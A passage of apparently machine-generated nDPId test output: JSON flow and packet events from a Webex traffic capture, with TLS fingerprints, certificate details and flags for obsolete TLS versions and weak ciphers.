Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1444570669762,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570669762,"pkt":"ABoRAAACABoRAAABCABFAAAoQwNAAEAGzt4KCAABPm3geMfTAbvSW4zuLaRzE1AQOQiETQAA"} -00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570669745,"flow_last_seen":1444570669762,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570669762,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51155,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01403{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":602,"source":"webex.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570669736,"flow_last_seen":1444570670676,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570670676,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51154,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -01403{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":606,"source":"webex.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570669745,"flow_last_seen":1444570670730,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570670730,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51155,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": 
{"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":632,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570672215,"flow_last_seen":1444570672215,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570672215,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":632,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1444570672215,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570672215,"pkt":"ABoRAAACABoRAAABCABFAAA8MYhAAEAGVYAKCAABQERpZ6HLAbsAQeF1AAAAAKACOQgEvgAAAgQFtAQCCAoATND9AAAAAAEDAwY="} 
-00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":633,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1444570672219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570672219,"pkt":"ABoRAAACABoRAAABCABFAAAoAjpAABAGtOJARGlnCggAAQG7ocv\/vh6KAEHhdlAS\/\/9YlwAA"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":634,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":1444570672219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570672219,"pkt":"ABoRAAACABoRAAABCABFAAAoMYlAAEAGVZMKCAABQERpZ6HLAbsAQeF2\/74ei1AQOQgfkAAA"} -00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":635,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570672215,"flow_last_seen":1444570672269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570672269,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":643,"source":"webex.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570672215,"flow_last_seen":1444570672626,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4002,"flow_avg_l4_payload_len":667,"midstream":0,"thread_ts_msec":1444570672626,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41419,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":662,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570674487,"flow_last_seen":1444570674487,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570674487,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1444570674487,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570674487,"pkt":"ABoRAAACABoRAAABCABFAAA8CB5AAEAGejQKCAABrfMAbtlxAbui3tn8AAAAAKACOQgsWAAAAgQFtAQCCAoATNHiAAAAAAEDAwY="} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1444570674499,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570674499,"pkt":"ABoRAAACABoRAAABCABFAAAoAklAABAGsB2t8wBuCggAAQG72XFdISYDot7Z\/VAS\/\/8cOwAA"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":3,"flow_last_seen":1444570674500,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570674500,"pkt":"ABoRAAACABoRAAABCABFAAAoCB9AAEAGekcKCAABrfMAbtlxAbui3tn9XSEmBFAQOQjjMwAA"} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570674487,"flow_last_seen":1444570674600,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570674600,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS 
Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":671,"source":"webex.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570674487,"flow_last_seen":1444570675110,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"thread_ts_msec":1444570675110,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55665,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 
-00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":736,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570675941,"flow_last_seen":1444570675941,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570675941,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51833,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":736,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1444570675941,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570675941,"pkt":"ABoRAAACABoRAAABCABFAAA8SaRAAEAGwwMKCAABPm3lnsp5AbteGJvVAAAAAKACOQhIBAAAAgQFtAQCCAoATNJxAAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1444570675945,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570675945,"pkt":"ABoRAAACABoRAAABCABFAAAoAm5AABAGOk4+beWeCggAAQG7ynmh52QqXhib1lAS\/\/+1iAAA"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":739,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1444570675946,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570675946,"pkt":"ABoRAAACABoRAAABCABFAAAoSaVAAEAGwxYKCAABPm3lnsp5AbteGJvWoedkK1AQOQh8gQAA"} 
-00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":740,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570675941,"flow_last_seen":1444570675997,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570675997,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51833,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00572{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":821,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570679512,"flow_last_seen":1444570679512,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570679512,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":821,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1444570679512,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570679512,"pkt":"ABoRAAACABoRAAABCABFAAA8dLdAAEAGDZsKCAABrfMAbtl1Abugj6duAAAAAKACOQhfOgAAAgQFtAQCCAoATNPZAAAAAAEDAwY="} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":822,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1444570679516,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570679516,"pkt":"ABoRAAACABoRAAABCABFAAAoAphAABAGr86t8wBuCggAAQG72XVfcFiRoI+nb1AS\/\/8cNwAA"} -00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":823,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1444570679516,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570679516,"pkt":"ABoRAAACABoRAAABCABFAAAodLhAAEAGDa4KCAABrfMAbtl1Abugj6dvX3BYklAQOQjjLwAA"} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":824,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570679512,"flow_last_seen":1444570679526,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570679526,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS 
Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01402{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":846,"source":"webex.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570679512,"flow_last_seen":1444570680091,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":511,"midstream":0,"thread_ts_msec":1444570680091,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55669,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} 
-00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1058,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570693238,"flow_last_seen":1444570693238,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570693238,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1058,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1444570693238,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570693238,"pkt":"ABoRAAACABoRAAABCABFAAA8LOJAAEAGVXAKCAABrfMAbtl3AbsPD\/XWAAAAAKACOQic9QAAAgQFtAQCCAoATNk0AAAAAAEDAwY="} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1059,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1444570693244,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570693244,"pkt":"ABoRAAACABoRAAABCABFAAAoAxBAABAGr1at8wBuCggAAQG72Xfw8AopDw\/111AS\/\/8cNQAA"} -00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1060,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1444570693245,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570693245,"pkt":"ABoRAAACABoRAAABCABFAAAoLONAAEAGVYMKCAABrfMAbtl3AbsPD\/XX8PAKKlAQOQjjLQAA"} 
-00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1063,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570693238,"flow_last_seen":1444570693297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1444570693297,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01403{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1074,"source":"webex.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570693238,"flow_last_seen":1444570693766,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":4094,"flow_avg_l4_payload_len":682,"midstream":0,"thread_ts_msec":1444570693766,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.243.0.110","src_port":55671,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"64ea4359ad4b496db653a3f30f7073e6","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1112,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570694561,"flow_last_seen":1444570694561,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570694561,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51839,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1112,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1444570694561,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570694561,"pkt":"ABoRAAACABoRAAABCABFAAA802lAAEAGOT4KCAABPm3lnsp\/AbubwQrQAAAAAKACOQiUEgAAAgQFtAQCCAoATNm5AAAAAAEDAwY="} 
